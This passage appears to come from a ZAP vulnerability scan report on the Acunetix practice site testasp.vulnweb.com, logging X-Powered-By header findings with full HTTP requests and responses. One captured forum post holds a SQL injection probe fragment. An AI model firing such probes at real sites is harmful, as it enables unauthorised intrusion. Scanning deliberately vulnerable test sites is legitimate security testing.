class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4129 |
| Response Body - size: 4,129 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/sitemap.xml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 272 bytes. |
GET http://testasp.vulnweb.com/sitemap.xml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/styles.css |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/styles.css HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 247 bytes. |
HTTP/1.1 200 OK
Content-Type: text/css Last-Modified: Thu, 29 May 2008 12:11:27 GMT Accept-Ranges: bytes ETag: "cea5331f85c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3390 |
| Response Body - size: 3,390 bytes. |
body {
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; margin: 0; } td { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } th { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .bodystyle { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .small { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 9px; } .medium { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .big { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 16px; } .xbig { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 24px; } .expanded { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; letter-spacing: 2px; } .justified { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; text-align: justify; } .footer { font-family: "Times New Roman", Times, serif; font-size: 10px; color: #008F00; } .menubar { padding: 3px; border-width: thin; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; margin-top: 5px; margin-bottom: 5px; margin-right: 0px; margin-left: 0px; background-color: #BFFFBF; } A.menu { padding-right: 10px; padding-left: 10px; color: #008F00; text-decoration: none; background-color: #BFFFBF; } A.menu:hover { padding-right: 10px; padding-left: 10px; color: #BFFFBF; text-decoration: none; background-color: #008F00; } .disclaimer { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; padding-top: 0px; padding-right: 10px; padding-bottom: 0px; padding-left: 10px; color: #BFFFBF; } .FramedForm { border-right: #008F00 1px solid; border-top: #008F00 1px solid; border-left: #008F00 1px solid; border-bottom: #008F00 1px solid; background-color: #BFFFBF; margin-top: 10px; margin-bottom: 10px; padding: 5px; } .tableheader { border-right: #008F00 1px solid; border-top: #008F00 1px solid; border-left: #008F00 1px solid; border-bottom: #008F00 1px solid; background-color: #008F00; color: #BFFFBF; font-weight: bold; } .forumtitle { font-size: 14px; font-weight: bold; text-transform: capitalize; color: #008F00; margin-top: 5px; margin-bottom: 5px; } .forumdescription { margin-left: 15px; } .userinfo { text-align: center; font-weight: bold; display: block; position: relative; width: 100px; } .post { border-top: 1px solid #008F00; border-right: 1px none #008F00; border-bottom: 1px none #008F00; border-left: 1px none #008F00; } .posttitle { border: 1px none #80FF80; background-color: #BFFFBF; font-weight: bold; margin-bottom: 15px; padding: 2px; } INPUT { border-width: 1px; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; } TEXTAREA { border-width: 1px; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; } INPUT.Login { width: 250px; } INPUT.postit { width: 450px; } TEXTAREA.postit { width: 450px; height: 300px; } .path { font-weight: bold; color: #006600; margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; } INPUT.search { } |
| URL | http://testasp.vulnweb.com/Templatize.asp?item=html/about.html |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 333 bytes. |
GET http://testasp.vulnweb.com/Templatize.asp?item=html/about.html HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 4594 |
| Response Body - size: 4,594 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>Untitled Document</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a forum site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="http://www.acunetix.com/company/contact.htm"> offices</A> in Malta, US and the UK.<BR> </P> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 441 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 211 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Default.asp? Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 134 |
| Response Body - size: 134 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Default.asp?">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 439 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 210 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Search.asp? Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 133 |
| Response Body - size: 133 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Search.asp?">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 222 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Search.asp?tfSearch=ZAP Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 145 |
| Response Body - size: 145 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Search.asp?tfSearch=ZAP">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 457 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=0 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=0">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 457 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=1">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 457 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=2 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=2">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=0 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=0">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=1">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=10 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=10">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=11 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=11">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=12 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=12">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
